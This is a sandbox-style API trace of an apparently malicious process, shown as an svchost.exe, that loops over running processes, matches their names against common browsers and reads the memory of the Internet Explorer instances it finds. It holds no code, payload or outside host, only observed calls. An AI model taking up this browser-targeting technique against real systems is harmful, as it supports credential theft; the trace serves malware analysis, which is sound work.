	[0203.752] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0203.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.752] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.753] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0203.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.753] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.754] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0203.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x26e4
	[0203.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.754] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0203.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.755] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.755] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0203.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.755] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.755] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0203.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x26e8
	[0203.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.756] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0203.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.757] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.757] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0203.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.757] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.757] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0203.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x26ec
	[0203.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.758] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0203.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.758] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.759] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0203.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.759] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.760] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0203.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x26f0
	[0203.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.760] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0203.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.761] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.762] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0203.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.762] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.763] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0203.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x26f4
	[0203.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.764] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0203.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.765] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.765] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0203.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.766] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.766] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0203.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x26f8
	[0203.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.767] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0203.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.768] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.771] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0203.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.771] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.772] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0203.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x26fc
	[0203.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.773] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0203.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.773] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.774] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0203.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.774] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.775] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2700
	[0203.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.775] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.776] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.776] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.776] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.776] NtQueryInformationProcess (in: ProcessHandle=0x2700, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.776] ReadProcessMemory (in: hProcess=0x2700, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.777] ReadProcessMemory (in: hProcess=0x2700, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.777] ReadProcessMemory (in: hProcess=0x2700, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.777] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.777] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2704
	[0203.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.778] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.778] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.778] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.779] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.779] NtQueryInformationProcess (in: ProcessHandle=0x2704, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.779] ReadProcessMemory (in: hProcess=0x2704, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.779] ReadProcessMemory (in: hProcess=0x2704, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.779] ReadProcessMemory (in: hProcess=0x2704, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.779] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2708
	[0203.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.780] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.780] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.781] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.781] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.781] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0203.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x270c
	[0203.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.782] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0203.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.782] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.783] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0203.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.783] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.783] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2710
	[0203.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.784] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.784] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.785] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.785] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.786] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2714
	[0203.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.787] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.787] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.787] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.788] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.788] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0203.789] CloseHandle (hObject=0x188) returned 1
	[0203.789] Sleep (dwMilliseconds=0x64) 
	[0203.893] GetCurrentProcessId () returned 0x110
	[0203.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0203.897] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0203.899] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0203.900] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0203.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2718
	[0203.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.901] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.902] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.902] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.903] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.903] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x271c
	[0203.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.905] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.905] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.906] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.906] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0203.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2720
	[0203.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.907] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0203.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.907] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.908] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0203.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.908] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2724
	[0203.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.909] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.909] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.910] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.910] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0203.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2728
	[0203.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0203.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.912] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0203.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.912] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.912] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0203.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x272c
	[0203.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.913] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0203.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.913] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.914] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0203.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.914] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.914] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0203.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2730
	[0203.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.915] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0203.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.915] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.916] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0203.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.916] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0203.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2734
	[0203.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.917] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.917] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.917] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.918] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
